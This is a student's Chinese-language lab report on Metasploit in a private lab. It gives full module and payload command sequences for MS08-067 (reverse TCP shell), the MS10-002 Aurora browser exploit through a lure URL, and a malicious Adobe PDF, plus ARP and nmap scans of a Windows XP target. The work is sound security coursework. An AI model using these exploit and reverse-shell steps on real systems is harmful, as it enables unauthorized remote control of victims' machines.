Exp5 MSF基础应用 20154321何思影
一、基础知识回答
- 用自己的话解释什么是exploit,payload,encode
- exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步
- payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情
-
encode:编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现
二、实践过程
- 这次实验是用同学电脑做的,因为自己的电脑不好用,所以截图里面如果有别人的主机名称之类的就忽略吧,端口号什么的是自己的学号
- 1.Windows服务渗透攻击——MS08-067安全漏洞
- MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
- 我们利用这个模块进行主动攻击。
-
调用该模块,并且查看可以使用的payload
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
设置payload,tcp反向回连set LHOST 192.168.53.131
攻击机kali ipset LPORT 4321
攻击端口set RHOST 192.168.53.132
靶机winxp ipset target 0
自动选择目标系统类型,匹配度较高show options
看一下配置是否都正确
exploit
开始监听。-
-
成功获取win xp的系统权限
2.2 MS10_002_aurora漏洞攻击
- ms10_002台风漏洞是IE浏览器漏洞,也是黑客挂马利用的最热门漏洞。
msf > use windows/browser/ms10_002_aurora
调用该模块set payload windows/meterpreter/reverse_http
设置http反向回连- 依旧是设置攻击机ip、攻击端口
set URIPATH 4321zss
设置统一资源标识符路径- 开始监听
- 成功生成一个URL
http://192.168.53.131:8080/4321zss
- 在win xp的IE浏览器中访问该地址,显示空白(要关掉xp上的杀毒软件)
- 回头来看kali这边已经攻击成功了(见上上一张图),
ipconfig
试一下
2.3 针对Adobe的攻击
- use exploit/windows/fileformat/adobe_toolbutton选一个模块
set payload windows/meterpreter/reverse_tcp
设置tcp反向回连show options
查看要设置哪些东西- 根据要求设置好了,然后开始监听
- 接下来就要和之前左后门实验一样,把刚刚生成的pdf文件(在指定的路径里面找到)放到xp上,各种设置回连监听啥的
- 然后在xp上打开pdf,截图
- kali这边攻击成功,一样的
ipconfig(此处忘记截图)
2.4 辅助模块应用
- 我选了
arp_sweep
模块,这是一个可以扫描端口、各种连接等等的模块 use auxiliary/scanner/discovery/arp_sweep
进入该模块show options
查看要设置的东西set interface eth0
,set RHOSTS 192.168.53.132
设置靶机ip,set threads 2
设置过程忘记截图了run
开启扫描,成功地扫描到靶机
nmap 192.168.53.132
开启nmap扫描,可以看见开启的端口号,以及靶机的操作系统
三、实践总结
- 通过本次实验,我了解了更多的攻击方法和一些漏洞的使用情况,其实漏洞哪里都有,系统、软件这些都可以存在漏洞,以前我觉得我的本机在更新office的漏洞没啥用,现在看来,还是好好更新吧。在这个实验中也出现了很多问题,出现了这种不能回连的怪异的情况,也学会了很多解决问题和分析问题的方法,在这个实验中,首先排出了xp的问题,后来又排除了kali的问题,虽然最后没有解决,但是也收获多多。